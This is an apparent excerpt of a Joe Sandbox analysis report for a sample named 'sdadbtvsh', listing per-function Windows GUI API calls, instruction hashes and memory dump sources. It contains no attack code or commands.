                                                                                              • Instruction ID: 4272caa4a5b81bac3db1a2a63c6e0790efd90da612924dbd37e76097603f92f1
                                                                                              • Opcode Fuzzy Hash: 8c697c77a61aa7b519ec0c038cac6a93031519e1b4eab455447ae4c2af7d0bf1
                                                                                              • Instruction Fuzzy Hash: 0B117231501A25AFCB109F29EC08AAA3BA6BB85370F254724F939D72E0DB309951CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6f4450a1820ece14fd1ad5c1e7334cb349dcdc6b44594e0411f7b5b4a0be776
                                                                                              • Instruction ID: 18695ec5b75bb8744eaf7a36bdbe7a1758c6e43c161a47cdfbbf9203910e9963
                                                                                              • Opcode Fuzzy Hash: d6f4450a1820ece14fd1ad5c1e7334cb349dcdc6b44594e0411f7b5b4a0be776
                                                                                              • Instruction Fuzzy Hash: DE0184B22056167EE72125F86CC9F276B1DEF91374F35132DB521A11D1EA608C41C561
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 005F22D7
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F22E9
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F22FF
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F231A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: ba033179ba0091a6a7eb6eb109ad999178aa17033e4b188fe72c457a540d7914
                                                                                              • Instruction ID: 99249608ba9c2e07d873f36e57afeb16ba9b8f57d9d723fc3e644fec5f11899a
                                                                                              • Opcode Fuzzy Hash: ba033179ba0091a6a7eb6eb109ad999178aa17033e4b188fe72c457a540d7914
                                                                                              • Instruction Fuzzy Hash: BA1109BA901219FFEF11DBA5CD85FADBBB8FB08750F200491EA00B7290D6756E11DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452
                                                                                              • GetClientRect.USER32(?,?), ref: 0062A890
                                                                                              • GetCursorPos.USER32(?), ref: 0062A89A
                                                                                              • ScreenToClient.USER32(?,?), ref: 0062A8A5
                                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0062A8D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: 841b1d1a0015575c5ee947ad55e37a2bc71209da02ea269b4a38b64b8bafce3c
                                                                                              • Instruction ID: ca9c88532670e3d4023e0d37ef32ab46bd458501a253db35b62059f1427fba19
                                                                                              • Opcode Fuzzy Hash: 841b1d1a0015575c5ee947ad55e37a2bc71209da02ea269b4a38b64b8bafce3c
                                                                                              • Instruction Fuzzy Hash: A8114C7190092AEFDF14DF94E8459EE77BAFB05300F004555F911E7190D774AA82CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005FEA29
                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 005FEA5C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005FEA72
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005FEA79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2880819207-0
                                                                                              • Opcode ID: d39aa4889859fc5bbb5753235bf6e4f52758568eb93861041157162ce49621a0
                                                                                              • Instruction ID: 58bace72bf7e2d1fe1a958261da3141bea62155d31347538e654f62cc6e7f497
                                                                                              • Opcode Fuzzy Hash: d39aa4889859fc5bbb5753235bf6e4f52758568eb93861041157162ce49621a0
                                                                                              • Instruction Fuzzy Hash: 8F110C75900659BFC7119B68DC0A99F7F6EBB45310F004215F925E3390D7B48D0587A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00628792
                                                                                              • ScreenToClient.USER32(?,?), ref: 006287AA
                                                                                              • ScreenToClient.USER32(?,?), ref: 006287CE
                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006287E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 357397906-0
                                                                                              • Opcode ID: 95ca91aacdb0542b1bf710bc177b86d0772d231f0aa055140759eaedb6d5fdbf
                                                                                              • Instruction ID: f1be3c7e7da1a5829f818c73aa0e967ca5fce3ac61f88aa496731d15d4df523c
                                                                                              • Opcode Fuzzy Hash: 95ca91aacdb0542b1bf710bc177b86d0772d231f0aa055140759eaedb6d5fdbf
                                                                                              • Instruction Fuzzy Hash: 331142B9D0060AEFDB51CFA8D884AEEBBF5FB08310F109166E915E3610D735AA55CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00591ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00591F33
                                                                                                • Part of subcall function 00591ED9: SelectObject.GDI32(?,00000000), ref: 00591F42
                                                                                                • Part of subcall function 00591ED9: BeginPath.GDI32(?), ref: 00591F59
                                                                                                • Part of subcall function 00591ED9: SelectObject.GDI32(?,00000000), ref: 00591F82
                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006291E6
                                                                                              • LineTo.GDI32(?,?,?), ref: 006291F3
                                                                                              • EndPath.GDI32(?), ref: 00629203
                                                                                              • StrokePath.GDI32(?), ref: 00629211
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: bda82666651c4345b0bd6e115441509cbd643bd999ffa649d8bccf2e1cf03138
                                                                                              • Instruction ID: 03eca4bf922fcf6c309a78404f2d93051829550528e15604a5edc401baa92c88
                                                                                              • Opcode Fuzzy Hash: bda82666651c4345b0bd6e115441509cbd643bd999ffa649d8bccf2e1cf03138
                                                                                              • Instruction Fuzzy Hash: A4F05E31042A69BADB225F55AC0DFCE3F5BAF46310F048100FA11211E287B55622CFE9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 0059216C
                                                                                              • SetTextColor.GDI32(?,?), ref: 00592176
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00592189
                                                                                              • GetStockObject.GDI32(00000005), ref: 00592191
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ModeObjectStockText
                                                                                              • String ID:
                                                                                              • API String ID: 4037423528-0
                                                                                              • Opcode ID: 1dfb27107801cf0b8b5adc5f33138d2605a2b5778eb7303c13910504dcef119d
                                                                                              • Instruction ID: cf1dfce201c745f456d10cd42542128a8fc39d2073f84d8063184e1cd9ea9b99
                                                                                              • Opcode Fuzzy Hash: 1dfb27107801cf0b8b5adc5f33138d2605a2b5778eb7303c13910504dcef119d
                                                                                              • Instruction Fuzzy Hash: DFE06531240640AEDB315F78AC0D7D87F21AB12335F148216F6BA541E0C3718651DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 005EEBD6
                                                                                              • GetDC.USER32(00000000), ref: 005EEBE0
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005EEC00
                                                                                              • ReleaseDC.USER32(?), ref: 005EEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: b129790731bd1ea8e07736f06d0e58213f5a27ef762ae5f9ab89f6098e33ed95
                                                                                              • Instruction ID: 0e3df619d8caf391230e658faf23e1f57bd1c7d236b92693cade0612d1e82a9e
                                                                                              • Opcode Fuzzy Hash: b129790731bd1ea8e07736f06d0e58213f5a27ef762ae5f9ab89f6098e33ed95
                                                                                              • Instruction Fuzzy Hash: F0E01AB0800601DFCF60AFA0D80DA6DBFB6FB48310F108449E84AA3210CB384942DF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 005EEBEA
                                                                                              • GetDC.USER32(00000000), ref: 005EEBF4
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005EEC00
                                                                                              • ReleaseDC.USER32(?), ref: 005EEC21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: aadd373d0496cf90ae4442e783708d00759a19dd820a6362f68e1f16b0be986b
                                                                                              • Instruction ID: b17f8518c521ab79d20de6ed247afd09ae8f36bceb8f0c74e24919ef8a82a4b8
                                                                                              • Opcode Fuzzy Hash: aadd373d0496cf90ae4442e783708d00759a19dd820a6362f68e1f16b0be986b
                                                                                              • Instruction Fuzzy Hash: 02E092B5D00605EFCF61AFA0D80DA6DBBB6FB48711F159449E94AA3260CB389902DF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 005BE69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 3213639722-2276729525
                                                                                              • Opcode ID: fa764bf43df2f655d82c0780d0c86875ee6c1474d4654e1a76e019b0f6e52e03
                                                                                              • Instruction ID: d8cfdfded679ab145256c2789c34cabae4258c37b919012d36738e7cebfeb68d
                                                                                              • Opcode Fuzzy Hash: fa764bf43df2f655d82c0780d0c86875ee6c1474d4654e1a76e019b0f6e52e03
                                                                                              • Instruction Fuzzy Hash: BB514771A085029EDB117B54ED07BFA2FE4FB50700F3C8D5DE091822A9EF349C96DA86
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: dfd587649fb87b6f7ea38a3c41e26bf90464b3527a283307b4929a535d535608
                                                                                              • Instruction ID: c863c43fcec53b9ff95f71408b7349da149f91a34f2fe518dd139748a28c8e30
                                                                                              • Opcode Fuzzy Hash: dfd587649fb87b6f7ea38a3c41e26bf90464b3527a283307b4929a535d535608
                                                                                              • Instruction Fuzzy Hash: C3512E3550428B9FDF2ADF28C480ABE7FA5FF56314F244059E8959B2D0EB34AD42CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                              • String ID: CALLARGARRAY
                                                                                              • API String ID: 157775604-1150593374
                                                                                              • Opcode ID: 8dca4b16caaf3904f8dd3e737ec91c57d387fec42aaab77462c332f10faf1420
                                                                                              • Instruction ID: a2af094e29fba9bfbe5c77a2f4b298de65a794908a56d7937972533ced4bc69a
                                                                                              • Opcode Fuzzy Hash: 8dca4b16caaf3904f8dd3e737ec91c57d387fec42aaab77462c332f10faf1420
                                                                                              • Instruction Fuzzy Hash: 42416075A00219AFCB04DFA8C88A8EEBBB6FF59360F144059F506A7352D7709D81CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00624F7E
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00624F93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 50d1ad28f7684b3643a571db8ab96b0b69b4907fbe52918f60c9b62bb8d13978
                                                                                              • Instruction ID: aafd535bda6ad6fa19a87d194959d66d09726f1dcad9b73a42e05359aa880cef
                                                                                              • Opcode Fuzzy Hash: 50d1ad28f7684b3643a571db8ab96b0b69b4907fbe52918f60c9b62bb8d13978
                                                                                              • Instruction Fuzzy Hash: 5D314A74A0171A9FDB14CFA9D980BDE7BB6FF88300F10516AE905AB391DB70A941CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00597759
                                                                                                • Part of subcall function 0059771B: GetStockObject.GDI32(00000011), ref: 0059776D
                                                                                                • Part of subcall function 0059771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00597777
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 006240D9
                                                                                              • GetSysColor.USER32(00000012), ref: 006240F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 572efacec163b98034534d1df7651b05a7480ec5460f93f4c02b75e95926529d
                                                                                              • Instruction ID: 280c77f8f4e2233e8ce47e43890b4cb95af16677d8d8780560abec0a7584ec88
                                                                                              • Opcode Fuzzy Hash: 572efacec163b98034534d1df7651b05a7480ec5460f93f4c02b75e95926529d
                                                                                              • Instruction Fuzzy Hash: A1116A7261061AAFDF00DFA8DC45AFA7BB9FB08314F014518FD56E3250EA74E861DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005F25DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 10611945e8774401d29af68bf5d9755db95acbabd83d8bc9fdad997a615b8fe7
                                                                                              • Instruction ID: e4c2994406809d38766a3354b85e39b1c7bcc81370d29798fdb691cbc4cd6ff5
                                                                                              • Opcode Fuzzy Hash: 10611945e8774401d29af68bf5d9755db95acbabd83d8bc9fdad997a615b8fe7
                                                                                              • Instruction Fuzzy Hash: 1B01F5B560021AABEF14EB64DD15DFE7B66FF91310F040609F962973D6EA34980C8650
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 005F24D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 624084870-1403004172
                                                                                              • Opcode ID: 1b86ad77ec172bd62b93f82ce7fcbdf506fb74c99c9d663852e6460042a4f93f
                                                                                              • Instruction ID: f2c8b59dd88f64751b10e152e2ce0054a08d99c94a1961675d8f851efbc8619f
                                                                                              • Opcode Fuzzy Hash: 1b86ad77ec172bd62b93f82ce7fcbdf506fb74c99c9d663852e6460042a4f93f
